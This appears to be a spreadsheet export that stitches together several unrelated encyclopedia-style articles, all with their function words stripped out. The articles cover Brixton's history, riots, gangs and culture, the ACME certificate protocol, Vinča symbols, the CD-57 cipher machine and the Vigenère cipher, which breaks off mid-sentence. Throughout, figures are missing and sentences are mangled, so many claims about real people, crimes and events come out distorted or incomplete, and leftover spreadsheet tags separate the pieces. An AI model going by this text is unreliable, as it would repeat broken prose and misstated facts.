factory building. designed architect f.e. simpkins erected 1937, deco buildings still owned firm commissioned still used original purpose. brixton area bombed world contributing severe housing crisis, turn urban decay. this followed slum clearances building council housing. 1948: windrush generation 1940s 1950s, many immigrants, particularly west indies ireland, settled brixton.the first wave immigrants (492 individuals) formed british african-caribbean community arrived 1948 tilbury docks empire windrush jamaica temporarily housed clapham south deep shelter. nearest labour exchange (jobcentre) coldharbour lane, brixton, arrivals spread local accommodation.many immigrants intended stay britain years, although number returned caribbean, majority remained settle permanently. arrival passengers become important landmark history modern britain, image west indians filing gangplank come symbolise beginning modern british multicultural society. 1998 area front tate library brixton renamed "windrush square" mark 50th anniversary arrival windrush. 1980s: riots police actions scarman report brixton scene riots april 1981 time brixton underwent deep social economic problems—high unemployment, high crime, poor housing, amenities—in predominantly african-caribbean community. metropolitan police began operation swamp beginning april, aimed reducing street crime, largely repeated so-called law, allowed police officers stop search individual grounds mere "suspicion" possible wrongdoing. plain clothes police officers dispatched brixton, within five days almost 1,000 people stopped searched law. there intense local indignation this, since vast majority stopped police young black men. riot resulted almost injuries police injuries members public, hundred vehicles burned (including police vehicles), almost buildings damaged, burned. there arrests. reports suggested 5,000 people involved riot.following 1981 brixton riot government commissioned public inquiry riot headed lord scarman. subsequent scarman report published november 1981 found unquestionable evidence disproportionate indiscriminate 'stop search' powers police black people. report made number recommendations code police behaviour police criminal evidence 1984 creation independent police complaints authority 1985. 1999 macpherson report, investigation murder stephen lawrence, found recommendations 1981 scarman report ignored concluded police force "institutionally racist". 1990s: nail bombing john major's childhood roots area used campaign poster leading 1992 election "what conservative party offer working class brixton? they made prime minister."the 1995 riots sparked death black man, wayne douglas, police custody occurred atmosphere discontent gentrification brixton. april 1999, brixton market site first three attacks known london nail bombings. two, followed within fortnight, brick lane, heart east london's bangladeshi community, admiral duncan soho, frequented predominantly community. brixton attack, people injured. bomber caught third attack; reported intended ignite race across britain bombing campaign. convicted murder given concurrent life sentences. 2000s: regeneration gentrification there been, remains great debate regarding whether brixton's recent renaissance deemed regeneration gentrification. some believe area slowly undergone process gentrification since 1990s resulted many wealthy middle-class people taking advantage area's location thriving bohemian scene. however, others argue area undergoing exciting regeneration. recent years, brixton hosted regular farmers' market station road, well pop-up restaurants pop-up shops. galleries, delicatessens, bars, cafes vintage clothing stores, particularly around brixton village market also opened, believe gentrifying area similar nearby clapham. brixton exemplifies ongoing discussion regeneration. originally created community project, opinion divided whether fulfils intentions part local community, arguing seen another tourist retail attraction, council meaningfully engage brixton residents. others welcomed arrival entrepreneurial approach benefiting start-ups, brings people area benefited trade popularity.in april 2015, reclaim brixton protest held local residents activists opposing gentrification.in march 2016, campaign save businesses occupy railway arches commenced, long-running local businesses forced rent-rises. council passed plans network rail refurbish august.in 2019, plans 20-storey tower block providing office space unveiled taylor mcwilliams texan property developer whose company hondo enterprises bought brixton market 2018. this plan drew large opposition local community campaign groups, already concerned threat eviction popular local supermarket. despite petition overwhelming opposition, council planners approved development november 2020. transition town brixton first inner-city based 'transition town' projects brockwell park hosts annual urban green fair, first held summer 2007. brixton pound brixton pound first trialled transition town brixton's "local economy day" june 2008. launched september 2009 transition town brixton. brixton pound local currency available alternative sterling. first trading brixton pound september 2009 local businesses accepting currency.the brixton pound aims boost local economy build mutual support system amongst independent businesses tying local shoppers local shops encouraging local shops source goods services locally. notes available b£1, b£5, b£10, b£20 denominations depict local celebrities community activist olive morris environmentalist james lovelock. lambeth council endorsed project, economics foundation helped develop.on september 2011, brixton pound launched electronic version currency users text message. second issue paper currency launched, featuring well-known people brixton connections: b£1, black cultural archives founder garrison, b£5, basketball player luol deng (the reverse inspired evelyn grace academy), david bowie b£10 world secret agent violette szabo b£20.the reverse notes, designed brixton creative agency this ain't rock'n'roll, feature notable local landmarks stockwell skatepark, public electric avenue, nuclear dawn (one brixton murals), stirling prize-winning evelyn grace academy. four notes feature design motif inspired coldharbour lane's southwyck house "barrier block"). 2015, celebrate brixton pound's fifth anniversary, turner prize-winning artist jeremy deller commissioned design limited-edition note. described "psychedelic political", front featuring bright colors back quotation karl marx’s kapital ("capital money, capital commodities...by virtue value, acquired occult ability value itself. brings forth living offspring, least, lays golden eggs.")other towns cities used currency include city bristol, totnes devon, stroud gloucestershire lewes sussex. housing housing estates brixton home several particularly large housing estates: stockwell park estate stockwell brixton roads respectively; myatt's fields south north vassall road; angell town brixton road boundary camberwell; cowley cowley vassall roads, loughborough centre brixton, tulse hill estate, somerleyton estate moorlands estate, situated coldharbour lane. there also smaller estates blenheim gardens, caldwell gardens, church manor hertford. these estates account large part brixton residence.estates like stockwell park estate angell town estate originally designed accommodate high-level walkways envisaged link whole brixton. ground-floor garages estates proved major security problem. somerleyton estate dominated southwyck house (known locally "barrier block"), large horseshoe-shaped brick concrete 1970s structure backs onto coldharbour lane. 176-apartment block originally constructed shape provide noise barrier ringway proposed inner-london motorway planned pass brixton camberwell, later abandoned. some housing estates linked urban decay crime. gates iron bars constructed loughborough estate around loughborough road minet road response number murders around estate. loughborough estate home 3,000 families 1940s low-rise buildings 1960s/1970s tower blocks houses. problems urban decay reported around loughborough junction, catchment area loughborough estate, angell town estate moorlands estate. victorian buildings brixton still features grand victorian housing. brixton market brixton market open every day, selling range african-caribbean products reflects communities local area indian vietnamese supermarkets south american butchers amongst shops stalls.. london farmers' markets opened farmers market brixton station road september 2009. open every sunday culture brixton murals after riots 1981 series murals funded council. murals portray nature, politics, community ideas. surviving murals include brixton academy mural (stockwell park walk) stephen pusey (1982) showing mixed group young people, intended portray natural harmony could found children mixed backgrounds local schools. recent contributions towards brixton's mural tradition include portrait michael johns popes road dreph, created part brixton design trail september 2017 temporary installation "remain, thriving" njideka akunyili crosby brixton tube station, commission underground. 2018 dreph completed large mural depicting michelle obama dorrell place. entertainment ritzy cinema, coldharbour lane, formerly independent cinema owned picturehouse cinemas. building designed electric pavilion 1910 homer lucas, england's first purpose-built cinemas.brixton significant clubbing live music scene. large venues include brixton academy electric brixton. range smaller venues windmill, jamm, phonox major part london's live music scene. brixton splash annual one-day street party held since 2006. event community run, showcasing local talent celebrating cultural diversity history brixton.brixton also home 1970s purpose-built skatepark, named stockwell skatepark. media brixton served local news blogs brixton blog running since 2010 also prints monthly newspaper, brixton buzz formed 2011 radio choice independent local radio station broadcasting studios trinity gardens 1990 2004. replaced capital xtra. reprezent radio community radio station broadcasts brixton local area 107.3fm. brixton always served number long-running community pirate radio stations including lightning vibes religious sites christian churches brixton lies within anglican diocese southwark. grade ii*listed matthew's church, located brixton green, built 1822 architect porden greek revival style. "waterloo churches" built celebrate britain's victory battle waterloo. saviour's church location filming site alfred hitchcock's knew much 1955, identified film ambrose chapel. 1868 parish church jude, located dulwich road, designed architect john kirk woolwich. closed 1975, parish merged matthew's. church building today used business premises publishing company.christ church brixton road nouveau byzantine-style grade ii*listed building built 1902 beresford pite, paul's church ferndale road originally built 1958 seventh-day adventist church john soper. corpus christi church brixton comes remit roman catholic archdiocese southwark. brixton mosque masjid taymeeyah, brixton mosque islamic cultural centre, located gresham road, close brixton police station. mosque facilities women space worshippers prayer. opened 1990 oldest mosques south london. mosque provides religious, social financial support members.the mosque made international headlines reported richard reid, so-called "shoe bomber", attended mosque. abdul haqq baker, chairman brixton mosque, told reid came mosque learn islam soon fell called "more extreme elements". zacarias moussaoui, convicted conspiring kill citizens part september 2001, terrorist attacks, made initial steps radical indoctrination brixton mosque, reid, though expelled mosque turned wearing combat fatigues backpack, pressured cleric give information joining jihad. abdullah el-faisal, radical muslim cleric preached imprisoned stirring hatred later deported jamaica 2007, associated brixton mosque began preaching crowds people, ousted salafi administration 1993. afterward, gave lecture called devil's deception saudi salafis, scorning salafi muslims (especially members brixton mosque), calling hypocrites apostates (takfir). brixton synagogue brixton synagogue effra road opened 1913 closed 1986, congregation amalgamating nearby streatham synagogue. front building still exists. governance brixton town centre divided four wards lambeth council. brixton hill ward south acre lane west brixton hill coldharbour ward east brixton road/effra road south loughborough road ferndale ward north acre lane west brixton road tulse hill ward east brixton hill effra road/norwood road.the area south brixton water lane including brockwell park herne hill ward policing, drugs crime operation swamp before 1981 riot centre "operation swamp aimed reducing street crime mainly heavy so-called law, allowed police stop search individuals basis "suspicion" wrongdoing. plainclothes police officers dispatched brixton, five days almost 1,000 people stopped searched. local community consulted operation tensions black community police streets brixton reached breaking point. local residents complained young, inexperienced police officers sent streets, provoking confrontation. gang culture 2003 independent reported around "hardcore yardies" based lambeth, operating members "firehouse posse" brixton's "kartel crew". yardies historically associated jamaican immigrants recognised stronghold brixton. parts brixton referred "little tivoli" "tivoli gardens", notorious "garrison community" jamaica ruled gunmen. 1999 scandal broke metropolitan police detectives allowing known jamaican yardies stay britain intelligence tool. eaton green, yardies, escaped bail jamaica 1991 settled brixton, dealing crack cocaine. three months later green arrested brixton constable, steve barker, became paid informer. green provided intelligence yardie activity years, continuing firearms dealing crack throughout time.several gangs headquartered brixton area. "murderzone" (mz) gang, involved illegal drug dealing, hail somerleyton estate. "poverty driven children"/"peel crew" (pdc) located angell town loughborough junction area. "organised crime" (oc), gang linked various shootings ongoing rivalry peckham boys, based myatts field estate. gang, stands "guns shanks", "grind stack", "grip shoot", "gangsters always shoot", located mainly angell town.in 2011, five prominent members gang—ricardo giddings, helder demorais, jamal moore, shaquille haughton kyle kinghorn—were sentenced total years prison murder rival gang member, fifteen-year-old olumegbon.members local gangs mostly late teens early 20s, gang leaders usually childhood friends. brought london's poorest areas gang members reportedly move house house almost nightly basis, making hard track them. according metropolitan police, youth gangs organised criminal masterminds; however, continue evade police responsible numerous offences homicide. operation trident officers stated "struggle" persuade local people testify, fear reprisals. trident officers stated gang members "inept handling powerful guns", gangs machine guns, according detective many deactivated guns shipped balkans reactivated. brixton noted significant origins drill. drugs some media commentators persistently call brixton "the drugs capital london". shawcross, labour representative london assembly lambeth southwark, runs "brixton drug crime" campaign states website: raising disgraceful state brixton existence open drugs market centre council, mayor metropolitan police... police, drugs firearms unit transport operational unit officers undertaking long-term surveillance area (brixton town centre) culminating three-day operation june arrest dealing class drugs... police carrying continuing covert operations brixton patrolling drug detection dogs. this long-term crackdown cleaning dealers brixton.(retrieved july 2008) many decades, brixton reputation cannabis quoted local resident saying "people always smoked cannabis brixton everyone knows that, people walked street smoking spliffs years." this reputation amplified "softly softly" police approach cannabis piloted brixton 2001 2005. concerns raised "drug tourism" area. "softly-softly" pilot occurred context wider debate britain classification cannabis. despite pilot stopped replaced deal" policy, metropolitan police favour reclassification cannabis class class cannabis officially reclassified britain class class drug early 2004. january 2009 government reclassified cannabis back class drug. jayday cannabis festival from 2001 2004, brockwell park hosted annual cannabis festival, jayday, organised cannabis coalition. police reportedly maintained profile, tolerating smoking cannabis. 2005 london borough lambeth rejected application cannabis festival following grounds: "while lambeth council supports freedom speech right take part legitimate campaign, council cannot condone illegal activities cannabis drug pushing taken place previous festival held cannabis coalition. indeed council officers monitoring event past approached drug dealers offered drugs." brian paddick 2001, brian paddick, police commander london borough lambeth, became subject newspaper headlines implementation pilot cannabis programme brixton, also known "softly softly" approach, well posts made brixton-based urban75 internet forum. police officers instructed arrest charge people found possession cannabis. they instead issue on-the-spot warnings confiscate drugs. although paddick credited idea, pilot programme sanctioned commissioner police metropolis, john stevens. paddick asserts implemented policy wanted officers deal cannabis quickly informally could concentrate heroin crack cocaine offences, street robbery burglary, affecting quality life lambeth greater extent. pilot ended december 2005 replaced so-called deal" policy cannabis brixton following complaints increasing numbers dealers openly selling drug.paddick sergeant front line 1981 brixton riot, experience shaped attitudes confrontational police action strengthened belief community policing. december 2000 appointed police commander lambeth, worked december 2002, fulfilling ambition becoming head policing brixton. paddick gained much support local community approach policing addressed rally support march 2002, leading dominic casciani comment: someone said five years black, white, young old, straight gay, liberal anarchist would standing together giving standing ovation police commander brixton, people might said smoked spliff many. crime june 1998, crime brixton reported widely connection linked murders avril johnson michelle carby, brixton stratford respectively. both women shot homes separate, connected, attacks; addition, victims shot head. 2008 tony thompson, former time news editor, reported "gun crime began escalate following series south london gang executions late 1990s." thompson states "previous operations seen putting black community. trident, start, intelligence-led strong links black community."in 2001 metropolitan police raised concerns rapidly increasing crime london. time lambeth highest rate robberies london. july 2001 armed police officers shot dead black 29-year-old derek bennett brixton, angell town estate, bennett brandished gun-shaped cigarette lighter. verdict subsequent inquest ruled bennett "lawfully killed", verdict upheld subsequent appeal.in december 2004 operation trident officers armed officers assisting lambeth police number stop search operations targeting "suspected gunmen vehicles associated firearms" called "operation trident swoop" police. metropolitan police hoped "the searches deter suspects carrying weapons prevent shootings taking place, well possibly recovering weapons leading arrests." superintendent jerry savill, lambeth police responsibility policing brixton area, stated: this operation aimed specifically people information suggest involved crime offences. want send clear message carry guns lambeth, don't. time stop vast majority people borough feeling afraid street make gunmen fearful community helping police arrest them. september 2006 brixton scene widely reported shooting, involving boys shot packed mcdonald's brixton road/acre lane.in 2007 firearm offences rose percent london, totalling 3,459 "gun-enabled" crimes, including murders nine victims aged under. series crimes brixton, clapham streatham, including murders three boys week, media commentators call area "gun capital". popular culture music references brixton song started release "whoppi king" laurel aitken 1968 "brixton cat" dice boss 1969. this later followed august 1975 popular novelty song written sung geraint hughes jeff calvert (who billed "typically tropical"): white told story brixton bus-driver "going barbados" "coconut airways" escape rain london. 2022 article complex named brixton "mecca drill" original drill groups originating borough. 1979 punk song "the guns brixton" clash deals enforcement violence brixton. written group's bass player paul simonon, grew brixton, strong reggae influence. 1979 album forces victory long-time brixton resident linton kwesi johnson song called "sonny's lettah (anti-sus poem)" form letter brixton prison inhabitant mother. gang children, post-punk band attributed pioneering goth movement, formed based brixton early 1980s. before gig, well-known punk band misfits involved fight thrown brixton prison, write song "london dungeon". eddy grant's 1982 album killer rampage contains song "electric avenue", reference well known shopping street central brixton, first electric street lighting installed. song evokes images poverty, violence misery also celebrates energising vibe area. pogues song "transmetropolitan" album "red roses (1984) mentions "brixton's lovely boulevards" along many london landmarks. song "journey centre brixton" r.o.c. song "brixton, bronx baixada" brazilian rock-reggae band rappa social differences, comparing neighborhood bronx york baixada fluminense janeiro. song "and created brixton" featured carter album world without dave. mentions many famous landmarks community including ritzy cinema prison. brixton-formed alabama album "exile coldharbour lane" references brixton life. subject maxi priest's 1990 song "close you" brixton. winehouse's song jones" features reference brixton. california punk band rancid wrote song called "brixton" appears rock stars kill compilation, later sides sides. electronic band chase status collaborated cee-lo green record brixton briefcase, features album more idols. track "buckingham palace" rapper canibus' 1998 debut album can-i-bus, brixton mentioned. robbie williams mentions "moving bricks brixton" 2012 song "candy". streets mentions london bridge burns brixton's burning 2002 original pirate material "let's push things forward" english singer david bowie born brixton 1947. american singer taylor swift references "nights brixton" 2019 song "london boy". english singer-songwriter elly jackson roux lives brixton, created songs 2020 album supervision. "welcome brixton" released british rapper 2020. british pioneering group hijack brixton. song "it's only natural" american rock band chili peppers 2022 album unlimited love tells story lovers. while female subject daddy's girl, pride brixton" male southend boy" knows fight. they fall love despite class differences. film television director richard parry's 2001 film south west nine (sw9), whose name refers postcode covering much central brixton, shot here. confusingly, postcode officially stockwell although northern part brixton falls within boundary whereas (the brixton hill sorting office) also covers tulse hill a204 road, streatham hill brixton hill. sarah manning, fictional character orphan black, america series, brixton. 1975 film monty python holy grail, fictional co-directors listed llama brixton. literature john carré's novel tinker, tailor, soldier, spy, "scalphunters" britain's based brixton, grim flint schoolhouse... behind flint wall glass barbed wire top." they section specializing "hit-and-run jobs... dirty risky residents abroad" "murder, kidnapping, crash blackmail." internet urban75 long-running internet forum based brixton. transport buses brixton served london buses routes 109, 118, 133, 159, 196, 250, 322, 333, 345, 355, 415, 432, n35, n109, n133 london underground nearest station brixton victoria line. around corner national rail station. national rail nearest station brixton southeastern services towards london victoria orpington. located around around corner underground station. road network brixton located several main roads. a203, a204 a2217 links area vauxhall bridge london brighton road runs area north south. brixton major interchange south cross route, part london ringways plan, cancelled 1970s. notable people three people lived brixton blue plaques marking former homes: havelock ellis, pioneer sexologist lived dover mansions canterbury crescent james, writer black political activist, lived railton road, offices race today. leno (1860–1904), english music hall comedian famous drag acts akerman road).other notable people brixton connections include: david bowie born stansfield road, brixton. former london mayor livingstone grew lived many years brixton. poet linton kwesi johnson long-time brixton resident. former british prime minister john major spent part childhood living coldharbour lane. began political career local lambeth councillor. wall, comedian music hall performer, born brixton. freddie davies, "parrot-faced" comedian actor, born brixton 1937. poly styrene, singer band x-ray spex, born bromley 1957 grew brixton. jumpin jack frost, drum bass producer born still lives brixton. danny williams, heavyweight boxer, born brixton frank dillane, film actor, born brixton well spending early childhood there. paul simonon mick jones clash brixton. drum bass producer dillinja brixton. screenwriter, director daniel mulloy born brixton. band alabama formed brixton. house music basement jaxx formed brixton. ebk, long-term resident brixton. fruitbat power-pop punk band carter unstoppable machine long-time brixton resident. chappell, actress, best known cally blake's cornish, presenter production adam 1990s, current comedy radio presenter bbc6 music adam buxton. bradley mcintosh, member group club sharon osbourne, wife ozzy osbourne daughter arden, born brixton. mike skinner band "the streets" moved brixton 2000 pursue recording career. some songs living brixton. skin, singer band skunk anansie, grew brixton. stereo mc's, acid jazz/club dance group, formed still based brixton. novelist martin millar lived here, novels around brixton. environmentalist james lovelock, famous proposing gaia hypothesis, born spent childhood brixton. frank reginald carey, second world fighter ace, born brixton. self, artist, long-term resident brixton. iwan thomas, olympic athlete. nyron nosworthy, professional footballer. shivani kapoor, indian model. rapper. several members solid crew. sneakbo, rapper. narstie, rapper. luol deng, player american basketball team miami heat, lived played brixton. alex wheatle, novelist. lisa maffia, singer personality, brought brixton. bunmi mojekwu, actress. james dagwell, journalist former news presenter, lived brixton. roux (elly jackson), musician, born raised brixton. locke, contemporary artist, resident years, cited brixton market influence work. nikki sudden dave kusworth jacobites shared house norwood road, brixton, early 1980s. danny kirwan band fleetwood born raised brixton. clive dunn (1920–2012), best known playing lance-corporal jack jones british sitcom dad's army, born brixton. jean kent (1921–2013), actress known appearing british films, born brixton. philip lindsey clark, sculptor, born brixton tracey, rapper, born brixton raised ladbroke grove. dillian whyte, jamaican born boxer; immigrated britain teenager grew brixton. dave, rapper, born brixton raised streatham. pearson, british musical double act, lived electric avenue l</t>
  </si>
  <si>
    <t>Automatic Certificate Management Environment</t>
  </si>
  <si>
    <t>automatic certificate management environment (acme) protocol communications protocol automating interactions certificate authorities users' servers, allowing automated deployment public infrastructure cost. designed internet security research group (isrg) let's encrypt service.the protocol, based passing json-formatted messages https, published internet standard 8555 chartered ietf working group. client implementations isrg provides free open-source reference implementations acme: certbot python-based implementation server certificate management software using acme protocol, boulder certificate authority implementation, written go.since 2015 large variety client options appeared operating systems. acme service providers providers support no-cost low-cost acme based certificate services include let's encrypt, buypass ssl, zerossl ssl.com. number certificate authorities software vendors provide acme services part paid solutions entrust digicert. versions version specification published april 2016. supports issuing certificates fully-qualified domain names, example.com cluster.example.com, wildcards like *.example.com. let's encrypt turned support june, 2021. version released march 2018 pushed back several times. acme backwards compatible version supports wildcard domains, *.example.com, allowing many subdomains trusted tls, e.g. https://cluster01.example.com, https://cluster02.example.com, https://example.com, private networks single domain using single shared "wildcard" certificate. major requirement requests wildcard certificates require modification domain name service record, verifying control domain. changes acme protocol since include: authorization/issuance flow changed. request authorization changed. "resource" field request bodies replaced header: "url". directory endpoint/resource renaming. renaming challenge resources. account creation agreement step instead two. challenge type implemented, tls-alpn-01. earlier challenge types, tls-sni-01 tls-sni-02, removed security issues. also simple certificate enrollment protocol, previous attempt automated certificate deployment protocol references external links barnes, richard; hoffman-andrews, jacob; kasten, james. "automatic certificate management environment (acme)". ietf. list acme clients let's encrypt list commonly used acme clients acmeclients.com</t>
  </si>
  <si>
    <t>Vinča symbols</t>
  </si>
  <si>
    <t>vinča symbols, sometimes known danube script, vinča signs, vinča script, vinča–turdaș script, european script, etc., untranslated symbols found neolithic (6th millennium artifacts vinča culture central europe southeastern europe. whether earliest writing systems simply symbols sort disputed. they sometimes described "pre-writing" "proto-writing". discovery 1875, archaeological excavations directed hungarian archaeologist zsófia torma (1840–1899) tordos (present turdaș, romania) unearthed cache objects inscribed previously unknown symbols. 1908, similar cache found excavations directed serbian archaeologist miloje vasić (1869–1956) vinča, suburb belgrade (serbia), turdaș. later, fragments found banjica, another part belgrade. since 1875, vinča sites identified serbia alone, many, including vinča itself, fully excavated. thus, culture whole area called vinča culture, symbols often called vinča–turdaș script.the discovery tărtăria tablets romania team directed nicolae vlassa 1961 revived debate. vlassa believed inscriptions pictograms. other items found site discovery subsequently radiocarbon-dated 4,000 1,300 years earlier date vlassa expected pre-dating writing systems sumerians minoans. however, circumstances discovery authenticity tablets disputed. corpus although large number symbols known, artifacts contain symbols unlikely represent complete text. possibly exception sitovo inscription bulgaria, dating disputed; regardless, even inscription around symbols.most inscriptions pottery, remainder appearing ceramic spindle whorls, figurines, small collection objects. symbols consist variety abstract representative pictograms, including zoomorphic (animal-like) representations, combs brush patterns abstract symbols swastikas, crosses chevrons. over inscriptions consist single symbol. other objects include groups symbols, arranged particularly obvious pattern, result neither order direction signs groups readily determinable. usage symbols varies significantly objects; symbols appear tend almost exclusively appear pots, symbols grouped symbols tend appear whorls. quantitative linguistic analysis leads conclusion signs share properties pottery marks, 11.5% part asymmetric ornaments typical whorls vinca culture, 29.5% represent sort symbolic (semasiographic) notation.a database vinca inscriptions, datdas, developed marco merlini: datdas organizes catalogue 5,421 actual signs. these recorded corpus 1,178 inscriptions composed signs inscribed artifacts (some finds inscriptions). dating these findings important bulk vinča symbols created 4500 4000 symbols tărtăria clay tablets possibly dating back around 5300 (controversially dated association). this means vinča finds predate proto-sumerian pictographic script uruk (modern iraq), usually considered oldest known writing system, thousand years. analyses symbols showed little similarity near eastern writing, resulting opinion symbols sumerian script probably arose independently. meaning interpretations nature purpose symbols mystery. although attempts made interpret symbols, agreement might mean. property marks some researchers, milutin garašanin dragoslav srejović, suggested symbols potter's marks owner's marks, meaning "this belongs some symbols, principally restricted base pots, wholly unique signs denote contents, provenance/destination manufacturer/owner pot. however, symbols repeatedly found throughout territory vinča culture, hundreds years apart locations kilometers away other. numerical signs some "comb" "brush" symbols, collectively constitute much sixth symbols discovered, represent form prehistoric counting. vinča culture appears traded wares quite widely cultures, demonstrated widespread distribution inscribed pots, possible "numerical" symbols conveyed information value pots contents. other cultures, minoans sumerians, used scripts primarily accounting tools; vinča symbols served similar purpose. religious symbolism some suggested symbols used religious purposes traditional agricultural society. fact symbols used centuries little change suggests ritual meaning culture represented symbols likewise remained constant long time, need development. symbols seems abandoned (along objects appear) start bronze age, suggesting technology brought significant changes social organization population, beliefs.one argument favour ritual explanation objects symbols appear seem much long-term significance owners commonly found pits refuse areas. certain objects, principally figurines, usually found buried houses. this consistent supposition prepared household religious ceremonies signs incised objects represent expressions: desire, request, vow, etc. after ceremony completed, object would either significance (hence would disposed would buried ritually (which interpreted votive offerings). early writing proto-writing some researchers suggested markings represent early form writing, often part broader tradition literacy referred "danube script" archaeo-semiologist marco merlini "old european script" anthropologist marija gimbutas. gimbutas reconstructed hypothetical pre-indo-european "civilization europe", defines occupied area dniester valley sicily-crete line. incorporated vinča markings model europe, suggesting might either writing system european language, probably, kind symbolic "pre-writing" system. however, generally skepticism. vinča symbols found area wider southeastern hungary, western romania, western bulgaria, described winn. also notes references citations bibliography further reading chapman, john (1981). vinča culture south-east europe: studies chronology, economy society. oxford: british archaeological reports. isbn 9780860541394. griffen, toby (2007a). "motif versus logogram vinca inscriptions". lacus forum. linguistic association canada united states. 79–84. griffen, toby (2007b), deciphering vinca script (pdf) palavestra, aleksandar (2017). "all shades gray: case "vinča script"". архаика. 143–165. solman, linehan, sproat, (2012). "corpora non-linguistic symbol systems". annual meeting extended abstracts. linguistic society america. 4–1. doi:10.3765/exabs.v0i0.576. external links 2008 symposium danube script: neo-eneolithic writing southeastern europe. held romania vinca-tordos symbols omniglot.com, including font created romanian linguist sorin paliga european script: further evidence shan winn</t>
  </si>
  <si>
    <t>CD-57</t>
  </si>
  <si>
    <t>(hagelin) cd-57 portable, mechanical cipher machine manufactured crypto first produced 1957. derived earlier cd-55, designed compatible larger c-52 machines. compact, cd-57 measured merely 1/8in 1/8in 1/2in weighed pounds (680 gr). cd-57 used wheels. variant cd-57(rt), similar device using one-time system rather rotating wheels. stg-61 licensed copy cd-57 hell.sullivan (2002) shows cd-57 attacked using hill climbing search technique. also m-209 notes references wayne baker, solving hagelin, type cd-57, cipher, cryptologia, 2(1), january 1978, pp1–8. louis kruh, cipher equipment: hagelin pocket cryptographer, type cd-57, cryptologia, volume 1977, pp255–260. geoff sullivan, cryptanalysis hagelin machine wheels, cryptologia, 26(4), pp257–273, october 2002. external links photographs simulator (windows) photographs cd-57: [3], [4], jerry proc's pages: [6], information stg-61</t>
  </si>
  <si>
    <t>Vigenère cipher</t>
  </si>
  <si>
    <t>vigenère cipher (french pronunciation: ​[viʒnɛːʁ]) method encrypting alphabetic text using series interwoven caesar ciphers, based letters keyword. employs form polyalphabetic substitution.first described giovan battista bellaso 1553, cipher easy understand implement, resisted attempts break 1863, three centuries later. this earned description chiffrage indéchiffrable (french 'the indecipherable cipher'). many people tried implement encryption schemes essentially vigenère ciphers. 1863, friedrich kasiski first publish general method deciphering vigenère ciphers. 19th century, scheme misattributed blaise vigenère (1523–1596) acquired present name. history first well-documented description polyalphabetic cipher leon battista alberti around 1467 used metal cipher disk switch cipher alphabets. alberti's system switched alphabets several words, switches indicated writing letter corresponding alphabet ciphertext. later, johannes trithemius, work polygraphiae (which completed manuscript form 1508 first published 1518), invented tabula recta, critical component vigenère cipher. trithemius cipher, however, provided progressive, rather rigid predictable system switching cipher alphabets.in 1586 blaise vigenère published type polyalphabetic cipher called autokey cipher based original plaintext court henry france. cipher known vigenère cipher, however, originally described giovan battista bellaso 1553 book cifra sig. giovan battista bellaso. built upon tabula recta trithemius added repeating "countersign" key) switch cipher alphabets every letter. whereas alberti trithemius used fixed pattern substitutions, bellaso's scheme meant pattern substitutions could easily changed, simply selecting key. keys typically single words short phrases, known parties advance, transmitted "out band" along message. bellaso's method thus required strong security key. relatively easy secure short phrase, previous private conversation, bellaso's system considerably secure.in 19th century, invention bellaso's cipher misattributed vigenère. david kahn, book, codebreakers lamented misattribution, saying history "ignored important contribution instead named regressive elementary cipher [vigenère] though nothing it".the vigenère cipher gained reputation exceptionally strong. noted author mathematician charles lutwidge dodgson (lewis carroll) called vigenère cipher unbreakable 1868 piece "the alphabet cipher" children's magazine. 1917, scientific american described vigenère cipher "impossible translation". that reputation deserved. charles babbage known broken variant cipher early 1854 publish work. kasiski entirely broke cipher published technique 19th century, even 16th century, skilled cryptanalysts could occasionally break cipher. vigenère cipher simple enough field cipher used conjunction cipher disks. confederate states america, example, used brass cipher disk implement vigenère cipher american civil war. confederacy's messages secret, union regularly cracked messages. throughout war, confederate leadership primarily relied upon three phrases: "manchester bluff", "complete victory" and, came close, "come retribution".a vigenère cipher completely random (and non-reusable) long message becomes one-time pad, theoretically unbreakable cipher. gilbert vernam tried repair broken cipher (creating vernam–vigenère cipher 1918), technology used cumbersome impracticable. description caesar cipher, letter alphabet shifted along number places. example, caesar cipher shift would become would become would become vigenère cipher several caesar ciphers sequence different shift values. encrypt, table alphabets used, termed tabula recta, vigenère square vigenère table. alphabet written times different rows, alphabet shifted cyclically left compared previous alphabet, corresponding possible caesar ciphers. different points encryption process, cipher uses different alphabet rows. alphabet used point depends repeating keyword.for example, suppose plaintext encrypted attackatdawn.the person sending message chooses keyword repeats matches length plaintext, example, keyword "lemon": lemonlemonleeach starts letter. rest holds letters shifted order). although rows shown, code many keys (different alphabets) unique letters string, keys: successive letters message, successive letters string taken message letter enciphered using corresponding row. next letter chosen, gone along find column heading matches message character. letter intersection [key-row, msg-col] enciphered letter. example, first letter plaintext, paired first letter key. therefore, column vigenère square used, namely similarly, second letter plaintext, second letter used. letter column rest plaintext enciphered similar fashion: decryption performed going table corresponding key, finding position ciphertext letter using column's label plaintext. example, (from lemon), ciphertext appears column first plaintext letter. next, (from lemon), ciphertext located column thus second plaintext letter. algebraic description vigenère also described algebraically. letters taken numbers 0–25 {\displaystyle a\,{\widehat {=}}\,0} {\displaystyle b\,{\widehat {=}}\,1} etc.), addition performed modulo vigenère encryption {\displaystyle using {\displaystyle written {\displaystyle c_{i}=e_{k}(m_{i})=(m_{i}+k_{i}){\bmod {2}}6} decryption {\displaystyle using {\displaystyle {\displaystyle m_{i}=d_{k}(c_{i})=(c_{i}-k_{i}){\bmod {2}}6,} {\displaystyle m=m_{1}\dots m_{n}} message, {\displaystyle c=c_{1}\dots c_{n}} ciphertext {\displaystyle k=k_{1}\dots k_{n}} obtained repeating keyword {\displaystyle \lceil n/m\rceil times {\displaystyle keyword length. thus, using previous example, encrypt {\displaystyle a\,{\widehat {=}}\,0} letter {\displaystyle l\,{\widehat {=}}\,11} calculation would result {\displaystyle 11\,{\widehat {=}}\,l} {\displaystyle 11=(0+11){\bmod {2}}6} therefore, decrypt {\displaystyle r\,{\widehat {=}}\,17} letter {\displaystyle e\,{\widehat {=}}\,4} calculation would result {\displaystyle 13\,{\widehat {=}}\,n} {\displaystyle 13=(17-4){\bmod {2}}6} general, {\displaystyle \sigma alphabet length {\displaystyle \ell {\displaystyle length key, vigenère encryption decryption written: {\displaystyle c_{i}=e_{k}(m_{i})=(m_{i}+k_{(i{\bmod {m}})}){\bmod {\ell }},} {\displaystyle m_{i}=d_{k}(c_{i})=(c_{i}-k_{(i{\bmod {m}})}){\bmod {\ell }}.} {\displaystyle m_{i}} denotes offset i-th character plaintext {\displaystyle alphabet {\displaystyle \sigma example, taking english characters alphabet {\displaystyle \sigma =(a,b,c,\ldots ,x,y,z)} offset offset etc. {\displaystyle c_{i}} {\displaystyle k_{i}} similar. cryptanalysis idea behind vigenère cipher, like 